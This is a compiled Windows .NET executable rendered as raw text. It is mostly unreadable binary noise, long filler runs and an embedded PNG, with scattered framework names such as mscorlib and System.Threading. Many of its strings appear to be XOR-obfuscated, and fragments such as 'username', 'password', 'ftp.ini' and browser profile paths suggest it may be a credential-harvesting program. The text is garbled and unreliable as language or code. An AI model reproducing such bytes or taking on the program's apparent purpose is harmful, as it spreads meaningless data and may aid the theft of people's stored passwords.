xye/''KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
gpf'
#7H
K#W&
K
9.*?.
MkJJY
Z0q4GxgFYtVKYWqsfppn
?*9?>;
'kMk9mGo2Wj1AVv9ltz0TTO4ZsOEqnRi0Gwy6yJM
.'.,*?.K$)!.(?K&.?#$/K
oOKK?vv
K"K?K.K
+W4N
KKOKKKh
K9K$K-K"K'K.K8K
OoS(
K
.'.,*?.~Kwur
VHKK
#$
K
.8$>9(.8e
L>O!W
6rB
K
K9K.K8K#K
jMKK
K>K;K;K$K9K?K
evd=.
]XEZQkbl
>v#[
J0LBK
M{O|D
K"K?K*K%KkK	K9K$K<K8K.K9KKK
G8|7
FjSrbgTULwck20
oBVB2iBsQZ51rP1mVONeJ
RT I\
WOKK 8
?@#[lKK
JFKIK
$6q(E%]s
!HtK
qv(i
$TJwNZwnARkOHkmnLVMRwfQ7Tl2nRMu8aFswv
.%,?#K.?	"%*92
$9&K
K!K!O#
#OJKKx
KaKK
System.Resources
Z^Z]Z@
_JKK!K!K#
KaKXJKJeKHK5]
#OKK
K#K.K'K'K
KKK0KaKeK3K&K'KKKKKnK8K
\]PW6
K$K1K"K'K'K*K
gDJhK
$$bF
KKJK	KKJK
"''.9K
KhKxi
HM/KKKKKHK
Uu!
K9K"K,K"K%K*K'K
K"K'K.K%K*K&K.KKK8K?K>K)KeK.K3K.KKKKK
,pO%qi
2
K!J
RuntimeTypeHandle
>"(
KKKr>WD
IKK
OKKlOKK
KKK[K_
l`'w
gR_
K)K{KKKgKIKJK
K"K'K.K
%=$ .K.?
5C<_DG
8__i
s7=/u
+Zd
DJKK
oOKK
K8K?K8K$K-K?K
K9K$K-K"K'K.KKK
K.K*K K
*"%K*9,8K
=M
K
yzKK
|zW#?wK
K*K?K.K
K;K.K9K*KkK
e.)O
K;K9K$K-K"K'K.K8K
:Oy~
KKK8
$,,"%,K,.?
^@KK
KKKKIKKKKKKKKKKKJK
HC 
P+Z
7S0b@v
KKK8u
"8;'*2
K*K9K*K%K,K
EUB}F
!K!K#C>
K
K3K;K.K9K?K
C<	J
6n/4*t
K9K"K=K.KKKaK-K*K=K$K9K"K?K.K8KeK!K8KKK/K9K"K=K.K8KeK!K8KKKnK8KnK(KKKKK
K.K)KeK
.*/K
5JKK#
G?e!C
*Ku9I
u,2
IZ'R
KKK8n
#KO
tx=
K&K?K;K
K(K(K$K>K%K?KKK
K*K&K.KKK
K?K;K
9"?"(*'
KKK8W
udxw
Show
mCME
#9.*/K
.3?K
PLKK
LCK/I
Z_RZ_R
*fhv1
#tKK
a
jCn
PIKK![
KKK8N
L*sp
#KOKK
IKK!A
*KKKK
KKKKKKKKKKKKKKKKK$K;K.K%KKKKKeK?K&K;KKKKKnK8K
OvKOKK9
$/.
??9")>?.K
iOKK
oX`N
.K'KxKyKeK/K'K'KKKKK
?Y!3
9$(
//9.88K#
JKK
nJKK#
{2u)
%
Kx
JKK9
K!K#
-FzK
CMiokWNMhAfgEeQTkek6mUbz
K*K<K KKK
$HgM
tR|.*
!*{Mn
MQKKx
&NCW43sKByV88z1PHPsnIfMMr9j9qOt99gkRRm7
6j*nAR
JEOAJVENkJJXKCLHZ
$9.k"%-$9&*?"$%qk#??;qdd<<<e")8.%8$-?<*9.e($&dFAFAKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
_4/K
JKK-
#*9K
:JKK
JKK#
KKJKh
KKIK
$%(*?K
o1Vc
d0`Z
pGG4
.($&;9.88./K
{L<g*E
#?6
K
jJKK
nKKKK
he1-
KzK~KeK{K
JKKK
qQf3KALfq6HZPA8VXg44QXNhCND8xVGc
I{KS
OKvKCKK6C
.&$92K/<
~w)4
JKKD
JKKkKKIK
JKKx
?*9?
//9.88K
-K
''$(
5CJ9
?Y!K
XW,k
K2K;K.K'KKKA
mKK#h
CBMLIY
~}|sr
*%/)$3".K
%?"
JKKKKKKKKKO
YWCw
Il[[@
K*K&K.K
I.?
jaf)/L
%="9$%&.%?
d5$hH
Ce	"
[OKKKK0KKKKKJKJKFJ[K
PDqGA
*(NpE*
saKHK,r
N=
Q
?.&KKKK8K:K'K"K?K.KxKeK/K'K'KKK&K$K1K8K:K'K"K?K.KxKeK/K'K'KKKKK%K8K8KxKeK/K'K'KKKKK8:'"?.x
KsK;K.K(K3K8K?K>K/K"K$K8K
9.*?.
;"K/''%*&.K;9$(%*&.K
dL1{
)8.%gk
''k
o##&
JKKr6GD
%E,ui!
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
#HJKK
<OKK
X\?s
>_!J
K>K;K
;9.;*9.
RV)7
Cp
_
?*?>8K/.'.?.-"'.K';
"'.
LCK?IEKCK3I
[IKKrv
CIKK
NfKKx
KkKK
K/K9K"K=K.K8KeK/K*K?KKKKKKKnK8K
ZI'
K$K&K$K/K$K
KfKyK{K
K}KfK
JEY
VY
CBNkJIXKOAJYwOAJYOAJY
K/K.K(KKKKKnK8K
>'?>9.v%.>?9*'gk
bWOkJBSAkHY
AJKK
kJWoA4
8,{0o/L2*
k<2
<I&?
KOKK
Y]gr
FYFCKJY
j,Ao
?u!K!J
=.%?K
KK
J
0LAs
MkJJZ
/.%?"-".9K
bp2Km
n@BH
*%/'.9K
zAde
?2'.K
IKKKK
bWMkIIS[IGkOY
aSg`
"
KK
4H2l3H
L`KEKKY`KEKkY`KEKY`KEK+Y`KEK
|?JJK
XCKK
KnK8KnK"K
I?ovK6KK7N
AWKvKAKWK
:<&p,?
pJKK
6fpp
$&;*9"8$%K

NtKs
K
;*9?&.%?
*9*&.?.9K
'eA45z2HZLxf9y77xjokRYcf69aGGDp9jmXMJTdj
BJJD
?T!/!K
(
K#k.
K
HKKOKKK
K;K'K>K?K"K'KeK.K3K.KKKeK3K&K'KKKKKfK(K$K%K=K.K9K?KkK3K&K'KzKkKfK8KkKfK$KkKnK8KkKiKnK8KiKKKnK8K
HtK;
HKKxMKK
S1m
HtK3
!iGyXLfSwsF5Z4SBMWa9xw1x0AkFkSNIEG
wJKK
OxVvDjuSX2QUUYf1z1zVlHTTTa8L6K
=8HK
5CK?B
wAKJKc>KKKK
K	K6KKKKK
IKIK
CHM
K-K?K;KeK"K%K"KKKKK
K?K;K
Dvdr
Q^G0|
{I]K
System.Collections.Generic
ZAT@/ZAT^)+XFZQk
$9?KKKKwuKK
BJJy
K8K.K9KKK
K*K%K
NtKK
HtKk
Z_PZ_P
K>K?K'K$K$K KKKnK8K
fFrH
K.K-K*K>K'K?K
KK$K
K
vK6KK
%fV0,v
FjI+
VNCCKJY
HtK{
4yRKyKKIKIKJG-"'.%*&.e.3.JKIKJL
JJKKD
IvKAK
KvK
*%/'.K;9$(.88
bWMkJIY
,+]n
LCKgI
NtK+
"8;$8*)'.K
!Vmov7eENb3Z7UROg1TNeHK7pbE7oJ0Rgi
Of.
uKKbK`K
ghxl
y2Wnx2LJ8WXxnp6RxsQsayat1GXbj
ewvg5
IJKKD
HtKC
.9"-"(*?"$%JCJKCKKKKKUJKJK
LMKaDgNMK?][OMK
"%xy
C:KJK
KKKKKK
K2K;K.K/K
W0tv
|ih
6W9
<KKKK
M>O!o
:<.5
K	K"K?K
HtKW
![!J
.*;KK
d06
$"%K.?
")9*92K
pTJJK
CkIJYzZ
3PU$
KMKX
8.9K
LCK{I
fACZ
+?+oI
<CO(
>%u)
LCKMKLC
K"K(K#K9K$K&K.KKKKK
K$K$K<K$K%KKK
'oSI
o59utZTeRVB9ygSTlpdH
e0%
JKK~IKK
9Op:O=N
g]
+
ZQk*?
ny
+HtK
JDKIK
")9*92e
K'aI^K
0Ma{%dV3
7oW*
3p_!
K
K9K.K8K#K
K
"%*92
,L9X
K*K?K(K#K"K%K,K
KnKKK
K$K3K&K*K"K'KaKKKKK
*(#./
%$%2&$>8
K.K8K8K*K,K.K
N	KKKKKHK
jyo}arc
?*?>8
K"K.K<K.K9KKKKK=K*K>K'K?K(K'K"KeK/K'K'KKKKK
zKKK
alM0
?*?.K
KIKK
:lb?
Y
MKJEY
^U$N
g)r
GaC{
9$(.88K;9(K	2;*88
=*8?
%~B+
>99.%?K
GRJ2
.??"%,8uFAkkkkkkw
5rlHZvyTxpAYHmrBWBHDOJoNSn9iE
UKUKBNKIISSCLOBZ#Z'BNLIVWB@LMCIY
VY
CBELN^Y
5OKD
cM:KKKKKHK
o[=
KKKK
KNK[K$sKKfKmK
K.K?K>K;K
K
K;K;K'K.KkK
K;K;K'K"K(K*K?K"K$K%KkK
W(k!*
K$K&K;K'K.K?K.KKKKKnK8K
H|
J*IvKICRI9
K&K*K"K'K
K/K/K9K.K8K8KKKKK
vKKKK[K\
?*?.K.?
vKKKK[K[
rKK!J
"&.K,.?
Xv]$
ZlLLEqixN8OPThWWe5NtgHq
KMKh
aKMK
0LA$
LMMm
LJKKKKKKKKKECJKKKOKKKKKKKKKKKKKKKKKKKKKKCJKKKKKKKKKKK
K8K8K#K
K$K8K?K)K$K3K
CVEVWBHAJIHAJCOAJVNNAJZ
"9.(?$92K
`'oc
LCKcI
N)KKKKKHK
qBSC7B92NyOViy
9$(.88K';
//9.88K';	>--.9K/<
*?#K
$ .%wd
o*
K
z8O1ov4gL4BpvwHkbeMKr9iPb7ESr
i
6t
GfKKK
&.g'
EYXNf7U2SZI1dkAlBUsgAtouLbnc6H
K
 "
cJ*s
*M7;
*3"&>&
;;'"(*?"$%
//9.88K/<
(?"=.
p0JJKs?KKKK
KKNKW
''K,.?
_CorExeMain
K{JHJKK
ZGR/ZGTV)+X@ZQk
C`7og
$B>R
LJKK
K#o#
K
=0zG
FrK
oJKK
OA;	O
NKKKK
}ty
%	*??.9".8u-*'8.wd
$&&*%/uFABkkw
9,>&.%?8un
%>&.9*?.
)&f5+
IyKKKKK
~	L x
K
K"K'K.K1K"K'K'K*KeK3K&K'KKKKKnK8K
99$9KKKK
K<|%JJK
KKNKq
3!KK
1IfK;
.(>9"?2Ke(?$9K
c=pJ
$/>'.uK
y
j
M %=P
KXHyKJK
K/KrKsKfK
K	KxK{KfKsKxKyK~K
KrK~K|K|KzK
#G<
K
KKKKKKKKKKKKKKKKKKKKKKKKKKKe?.3?KKK
IVe>
K$K$K?K
KRYyKJK{
ABLkHCVNCCHkKCHkKAMkIJVNIXLFBVBVBBCCCVBVNCCBBBKIJY
KtK[
ymmAeRQhKmRSRQGgZwfCmSewhzBV1a
AssemblyCompanyAttribute
O|p
BKIJY
qc^f
KZXKKKK
K
K*K=K$K9K"K?K.K8KeK/K*K?KKKKK
K
AqMKJY
K
"'.
KKKKnK8K
?o!Kx
kI^K
S	m*
[O]K
}IKK
?a!K#
XS/
_TQjs
9",,.98uFAkkkkw
`-bO$
1xr~
I(LCKsI
'KXK
C!K!K
@9h
GF9rz
}JKK[KKKsJKKOKKKKKKKKKKKKKKkKK+e9/*?*KK+KKK
aKK!J!O
A/W5
[!I
#CJKKX
"(9$8$-?
#mp5qq6cjOFffBON8b26NooxB7PZIAe4pfsa
$#OtK
.2K.?
#O=
K
JiI\&
nCCCY
'O&MKU&O&MK
!K!N#
F>s#
-aKKx
k$f
NKIEEWNKKY
OOKKJ
L%
>y[
X]ZQk
OKKGHKKQMKK
Z_]Z_]
LKKA
NtKo
NKKK8KKK
%Rpv3vFz7Ks0goge8FH7gfgz0n5txEzFIYpcG6
LKKK
KKK'
KeK(K$K%K-K"K,K
K^ye]
ZFV/ZFTR)+XGZQkv
L-2Y
KtK?
!S!K#ECN
tAQJ4oK5IqhS2v
?.&8K.?	"%/.9
9$(
//9.88KK
%-$K	*8.
//9.88K
''$(*?"$%	*8.K
''$(*?"$%
CKK]
K/K&K"K%K
PbIL
"%'$,$%K
o_KKKKr
$A*kp
ebFC^
O$
K
IIDK?
KKKOKKKKKKKKKKKKKKKK
[KKK
HCagY
K$K&K;K>K?K.K9K
0aUs
?9.*&
K
K?K;KKKKK
K)K'K.K
K
B|fW
#o<
K
?
'1
?.&Kwu(
"//.%uFAkkkkw
59|z
DKKK
sy@<
yKSK
KKfK
HKwIKKKKKKKKKKwI
kOtKw
NSOK
:Bi
DKKx
bKKK
y,W';
Z@XAZGX@ZFX@ZQk
?;}}
FE,
!K!K#0t
##"
K
UNtK
%#.9"?
tB))
,
>?.3K
3.(>?*)'.K
OtKw
K$K1K"K'K'K*KkK
K"K9K.K-K$K3KKKKK3K}K
@l2@
?}!K!K
=%9n
=1WES
K;K.K9K*K
System.Threading
a9B.
WT
K
OoK 
K
T{SVO7
#MkKK
}HtK#
KtKGuKKKK[K
/uFAkkkkwd
NkIECCNkKZ
?pr6_?Q
%-$uFAkkw
Y;KK
>C-DX
[OMKj
K#K9K$K&K.KkK
K;K*K9K KKK
Z_UZ_U
K
K>K?K$K
99$9KK
{#gJKK
?8.'-K
KKKK[KX:6OtKO
KKKK[KW>
N*KKKKKHK
K*K%K*K,K.K9KaKKKKKnK8K
%(.K
K
K(K(K$K>K%K?K8KeK?K/K*K?KKKKKnK8K
CbmI1H5nzZ4RjpppJQHkzPe
:6A*k
bWOkJIEAkHY
ZQk+_
>C8~
.9="(.8K.?
kOKKH
KKSK
9G)d"
`3vE
WIKKrv
'APl
]DFT
#?=
K
9$?.(?K%?;9$?.(?="9?>*'&.&$92K
spW9]
$;29",#?kc(bkzrrsfy{{rk)2k
$
99*2K
6Y&]l
$!n>
#{)
K
BNLHCCBFLNY
'M((vD
w""}
EMKKVZ
[B`$
#.%
=*"'*)'.u?9>.wd
cOKKK
K*K'K>K.KrKKK_
#o,
K#s,
K
aKK!K!K#
HCIKK-
K.K3K?K
*%*,.9K
KKJK
!/O8
?o!J!K!J#
]bSa
BJKK
9Bhx
@M!
esryr{y|wd
>%uFAkkkkw
=:X=
-D$N
$&;9.88"$%
K2K8K?K.K&K
K$K(K*K?K"K$K%K
MYCE
ENKJJY
NKKVY
NKIIEEHKKCLKJY
KKnK8K
9$(.88.8K,.?
L'UYx
4KKKKKKMKXKfKMK
O]KK
K8?>)K
IKJK
h
~&FH
IKKJRJ
.&$92K
NKKdHKK
ZK0~$
,j*s
|KKK
$%?9$'K
%'$*/
N
KKKKKHK
1\csf
DEllFJttOk7e1kXnyArYIZ
k!/]
|r{#_
HMY~HMYrHMYwHMYHMY
.'.,*?.
$9
>%(?"$%
#9.*/K,.?
"&"?u
q\KK
l{bf
,}}|F
%-$
"'.
Uchv
OAGff
K?K>K/K"K$K
I"KvK
Wo?
#gJKK
NK#JK
K$K&K;K9K.K8K8K"K$K%K
MKJYVYvNKJJYVCKIY
_KKK
2W`z
NKK}NKKi
K-K*K=K$K9K"K?K.K8KKKKKhK/K$K(K>K&K.K%K?KeK-K*K=K$K9K"K?K.K
bfj`
;'"?K,.?
K#K>K%K/K.K9K)K"K9K/KKKKK
v_33
B |Q2
.9&"%*?.u-*'8.wd
''$<
=*'>.KK$9","%
{]PUV
LCKwI
8KdHpjgQO6TZ6F3AJJtGW0d1
99$9K/<
K]uv
Tr|rd
KKKaK
+$/]$
LCK#I(LCK;I
$OE9JPEbpmXnAspE1lvKRAyAOigC38xMmtXIA
K,.?
G-G'G3G
?q3H
K"K8K*K)K'K.K
kItK
7KKK
*%*,.&.%?K
K-K-K"K(K.K
$&;9.88./K8"1.
KKKKK-K"K'K.KqKdKdKdKKKKKKKKK
Y_VNACCVNY
|{x4
Z_TBZ_TB
K^K;
$"%?.9K
?D#OJKK
JBGLLEY
"%/$<8e
$9&8K
K3K.KKKKKKK
EGIKK
C>wc
N/~~
.'.?.K
K>K?K?K2KKK
.9=.9KK
?*9?K
KHKH}
;ISYv0x
%!.(?"$%
XOZOW
nLkII[Z#CFkOY
wS-_
AssemblyCopyrightAttribute
?.&K,.?
-c/w
DblI06W2175h6PrQgtBx
K.K(K>K9K.KkK
K
KKK6C
Mi)
PjKK
ReS
P }a
/KKK
4kKK
K$K,K"K%KkK
BBLOVNBY
.??"%,8uFAkkkkw
''$<
`~sS
WvA@
(Xh"%
!STj
~^AP*	~
&mnFZa1iAh66uvqo2JrO7ldPvPC9d5mM9Lw9RQ5
'$8.K
4SNtK
#
K9
4_K=(
DKK#uZ
K
?*9?K,.?
lgce7u
J}KJKKKKK
K$K<K%K'K$K*K/K.K9K
KJKKK
.,"$%
KKK#c&
K
s#PU
~'I?Djh
IKIKIKIKKJKKK
J`J]GMcSKKAcCKKAFBBTw
K$K(K K
KKK
K>K?K$K&K"K1K.KKKKKnK8K
*'>.
%=$ .K
`T I
$$?K
Y@]<`
nWC,
ErKK!K!M#
Exception
6[K?Q!K!J
>e#;
C>Lx
K.%.9"(
6t#a
"qn8Y
.88*,.	$3	>??$%8K
WW3s5cPZbhLCMezLhb8b0efxEJe1zNhW
?*9?
$%?"%>.
@,W,
&=aV!IQ
K9K$K?K.K(K?K"K$K%K
$Yb&
BMKHSBICBKNISSVNBCBKNISSVNCCCKHCVNVNAMKJY
lKKKK
IKK9KKK
$%.K
"'.
.(>9"?2K
KK&K)K
#c&
K
K#K9K$K&K.K
9ufZ
7HKK
R` wZ
KJKKJK
wN<MD
WOKK>R
*%*,.&.%?	*8.
oOKK?
SvKIC
yneXl+.
u=.98>S-
K2K8K?K.K&KCKKK]	K"K%K/K.K9K
K"K%K/K$K<K8KkK
yKtKc
vUvnjrV1W6KwgPryC5o9dVdg2Mk2EkbH
.=.9K
d{yd&"?d?*8 iuFAkkw
:jCn
HkKJOJKKK]JKZ
n`Mk
7c
*>'?K
3rzm
KKKKk
kZB
/JKK
iHJhK`hLJhK
7o_KD
+8%	\
RTrAE0iM1NIUhc1WVh7DWNpr
NkKY
QKKx
?_!3
tV0-
KrKxKzKeK/K)KKKKKnK8K
~sdI*
3"8?8K
#JKK
MJKK
KxKyKnKKKKKnK8K
{mUV
KKKKK
3.(>?"$%
K#K.K9K9K$K/KkK
H?>3BqL7
SNZIvKAKZI(
?_!Q
SOKK?@
mAKK
%8.9?
(.K,.?
[ajNgp2C&k
6kItK
nIKK
baJJK
>Z!J
'doWMqHwaxoyeiMl44Ydw0ZLXMCHdvt9aLNVG15j
KqKeK6KKKKK0K
Vv4
]KKK
KKKK*
%-$K.?
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
nKKK
?k!K!J
VKz=
gKKK
eKKK
aKMMm
:GKK
.'.,*?.zKwur
K.K)KkK
C>#c&
K
r62YSOLCwEFGRGcJG0WH8MZxB
QKKK
vHJKKD
^Js$
ne{L
K*K?K#KKK
*&.K"8<$<}
vKKKK[K
JIJKKY
&*,.	*8.K
|??;2JV
*%/'.K9>%%"%,K
ipqa
Cp_9
}M2Bp
HKK>NKKfKKKrIKK
KKKK[K{
'K]KO
KJKKKKK
hKKx
JKK	KKKwJKKKKKKKKKKKKKKKe/*?*KKKo
KKKK[Kq
?d{Y
"514k5ubndSQCr1efUNJKBsVinOARLA56Tc
KKKK[Kr
zEGKNJY
KKKK[Ko
KKKK[Kh
KKKK[Kk
HKKIKKK
.?<$9 
=*"'*)'.u-*'8.wd
.&$92KKKK
?P!J#JKK
KKKK[Kc
SOKKJ
KKKK[K]
$w9]
K/K.K-K*K>K'K?K
NkJJYvMkIJVNCNkKY
tKKK
/K/<
#E.u
t8$K6G
ZP2Q
KKKK[KS
"8?+zK
KMK<
p
S9
KKKK[KO
KKKK[KN
uK8_s
BKK!T
KKKK[KK
c.3O
|IDAT
KKKK[K@
KKKK[KC
LCKkI
RBIzDJTnmqrITcLQoYdn0WJ
IAwQ*
-KKK
,9!0
Z_ZSTD
d2:7oY
wB<CD
dTJJK
JlnSCY53am8NCzVT3sLmEpgEQyiNb
6_L?M
KxKkK
KKKK[K,
5KoVlfAeLL4kznEW2CwqvCACJTKMSLX
?z#IKK
KKKK[K)
IKK
!KKK
KKKK[K*
#,T4
HKKENKJEZ
SOKK
cIKKMaKKX{CKiLKKCKKZ
VNCLKJY
{KK!J
_OKK`
IEND
~fS:
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
)F]T
LCSY
JKKr>
9$(.88KKK
KKKK[K
"8;$8.K
?*9?>;K.?
$'/.9
%?.9*(?"=.
iRy9
S$1HW
o)
K
a^~
KKOKKKh	'$)KKK
S/XZ]XYZQk
J)0m
K$K-K?K<K*K9K.K
K/JIJKKI
fB7xixEXnRpsfZdfqvkSpSRpnAfk9
g>Bb&
K%K?K.K9K%K.K?KkK	K9K$K<K8K.K9K
{-D%
NKKKMKK(HKK
K(K.K
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK `
]KKKIKKK`_cNKKMMk_D>
K>K?K'K$K$K K
6_K>A
K%K*K)K'K w
-	2?.8
aF%8
4JFk
?4KtK7
"QPyoUQC4maOe89ZepQ8xJfpvFgObQAtP1x
KJKKK
Ae]`+
4KtKg
}HKK
.?<$9 
=*"'*)'.uFAkkkkw
qX
Y
o
K?K*K9K?K>K;K
K"K'K.K
JFK{
+-%
LT
KnK8KnK8KKKKKnK8K
[p
[>X
n[Z#CY
kX2H
J_:4
|So
3*
Z_TEZ_TE
8
'"=.K,.?
K*K8K8K<K$K9K/KKKKK
nHMZ'HU
TEfp"
6_K?
#GKK!_
VMKn7O&MK
tKK
!K!JH
MkJIZ
BSx"
hKKK
Z_QZ_Q
.8$'=.K
88.&)'2K
_vr)qxs
S|Rv<x
JU01t5HDbZ2sdP4wtahG9g9k
+HMYjHMYvNKJJVENKIJEENKJEY
LKIY
)*'W
IJKKJHJ
g~jM
fKKK-p
m9f2LaaO36Jj1T13ZD2qW6daubzNU
9"?.
''
pl-o
]
&KKK
K/JIJKK<
%-$K .9%.'xyK&.&$92"%-$K
lTh
%	*??.9".8u?9
/2<2
"?.k-$9&*?kxK
bGlo
K2K;K.KeKKKU
KKKp7owD
=*'>.KK>8.9%*&.
w_X5
F*K8
~U'"
KfK
KzKrK~K	K	K}K~K
XL]XCk
!]!K#p>
$KKKK
qA7 3
NKIJCCOKJJSLKK^Y
vej
OoG 
K
KMKl
YJKK
)|-
HtK
KrKKx
ElOpoENdkh121JLHrpTmpRkqtoRP
N59o"
<\bGo9Y
ir\b
3.(>?*)'.
K"K/K.K
KKK!
:}o<
'$?KKK
RFQ#35242411
K2K)K.K9K-K$K3KKKKK
K%K*K)K'K.K/K
O6IKKK
`NbH#
~@,D
"WVc5z55lUVQqiBzQOzH8GWB5q8jeO33gnA
K(K$K%K
Xm~:
^KKbKHK`KFJ[K
!K!N#c0
K
K$K$K%K
wRu8!~
vK[KK8E
HMY
_OKKH
.?#$/
_OKKK
K
K*K9KyK
XJKK!I
6W.5
#C1
K
OKvKOKK6C
aZSr
ECkHJEWZ
.8>'?K
K/JAJ[K
K&K$K/K>K'K.K8K
FKqJ>M
UAKJKk
U6LWKN5ddX9vkQOev4sBJC8ELXy
%	*??.9".8uFAkkkkw
''$<
#9.*/
>e#;"
K#
6_A>m
K:"
-uk4
KJ[f
H8G!e
OKvKJKK6C
7osK6KK7N
ZYZZ|Ck
H=X!K!J
|I]K'
K"K%K*K8K
K
.8.9=./eFAFA
9+(O6
/BjH
K
K~KKKm
/BjJ
JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKX{IK
KKKJKKZcaKKMchKKMk?
"B>R
]F[
*Ss:
6CK>Lx
.8"1.K
//K
r1k>
s!
K
fKgK
<v6y
*'>.K
GbH3
caPn
!O#K[KK
IKKKKKKKKKKKKKKKKKKK
KKbK#K
,w.Y
IKKKJKK
#9$<8JHLJBDLLEYFY^YVVYFVWBHAJENLIYVBLfBYnDNDNLLDNDNDNDNDNDNCCCDNLCCBBVBVBVBCCDNBCDNBCBCCCCDNBCDNLCCBNKJSDJNKJDJSCkIY^EVYFMkIWWVWOkJIWNkJJYjOkJJIOkJJWOkKYnHkKEOkJHCXLAY
e#"Fs
+:
K
B?'.
BRIZ
YDHi
KKKK[KG<
k&$1
MH
C
;?St
,:Jfm
ZBnQ
K?K*K)K'K.KKKKK
})nsE
=M V
%HCt
bWCkII[IY
.)>,,.9K,.?
K9K$K-K"K'K.K8KfK!KeK!K8K/KKKnK8K
f|Z[
IKKJNJ
K;K.K9K*KKKKK<K*K%K/KeK/K*K?KKKKK
o"woX
6NtK
?.&8K
!M77YoMSiU9WbheG9MJwkr3hKBTniBFIee
Z_T@Z_T@
.Z
K
K.K'K>K3K.K
K
$AF/
$/>'.
K"K8K?KeK(K-K,KKKnK8K
.(>9"?2e
((.88
?fR7
MKK
G~?yx
%-$K,.?
'.=*?.
3HtK'
6GFD
`
Ln
K'K"K.K%K?KKKKKnK8K
yIKK!
pI>^
u}.K
%*)'./u?9>.wd
,fd-ht
PNG
>C
p
:}'R
VNVNBB[JIJ[VUKCHAJNGLN^Y
y.0Y
FSEQKJKKK
$(*'
rLKJY
Z]T[dCk
S7JyKJKnKKKK
($'>&%
!K!K##
KKbK-K
bQW5LFtRAfvEbXhljY5s9SQ6F6n
>[!K!K
#G/
K
EOKJEWNKJEY
K.K'K?KM
./"9.(?
_JKK
sP_n
yuY
G!K!J
OOkKZ3OkKZ?NkKZ
`B\+
4ZbISIfhXOkDF5lJdaGV
qy|q
]K!/
al&
wKKKK[KyE
S/XCk
.{sr^J
VW4nJCnOgraiH7yrkjsPDn
9$?.(?K';-'
N&:#
>F
K
\M!KKKKKHK
mscorlib
Thread
D57fLubOYw63j3AQaGkCzY4UDWg7
RKKx
0nX9nS
[e641A
9"%(";*'uFAkkwd
K@K3
kkkk
fh8T0HZ4HGnBcg3BvD2yyf8
4LKkiyoQnRHzga5e3PFK8KVXxQq6uRD
sCIKK
.*$,!~)
$&;*?")"'"?2
??9")>?.K
JXKMH
K9K"K=K.KKKaKeK(K-K,KKKKKKKnK8K
<XFZQk
K.K9K8K"K$K%K
v8eb
#ttKK
.NtK
KKKJK
KKJKi
_OKK!J
K
K(K(K
JHKIK
K#
"'.K/<
K"K'K'K.K9K
J[Ku
=a83,
$%->8.9
gZmh,[/M
:,K.X
JZKP
9$(.88K;9$(.88
((.88K)
>%u-*'8.wd
SBOKKY
9"%(";*'K
$,$%
b-rs
%?92
9"$9"?2uFAkkwd
*(#"%.K
K?K9K"K%K,K
K"K'K.K
4:Mr+
KKK!Q
KKOKb
ok/G
KKHKKK
KKNK
+KKK
H_a:
K#s
oOKK
Rp0pn
/e(;
wQ9@
?*9?Kwur
+JKK
KK[KKKh
#N)c
.*;
9..KK
K,.?*//9"%-$K
K9K*K,K$K%KKK
wQ9Q
T4ofOaLRhmvOpRWW5ajsKRCwq6lVUw51
JyKJK
$<%'$*/
"'.K
qCKK
K#o
GOKK
)V:N,
s3CIUZWjEIiYDj
:,/
9
3(.;?"$%
'*,8K
%?.9%*'
2Qt,
.="8"$%K/.)>,*(?"=.;9$(.88K
#utKK
LCKI&LCK
[<BY
x
"
BKIIY
:KtKS
JZKIK
UGt
$	"%*92
KKKK
.&$92K';	*8.
//9.88K)>--.9K8"1.K';
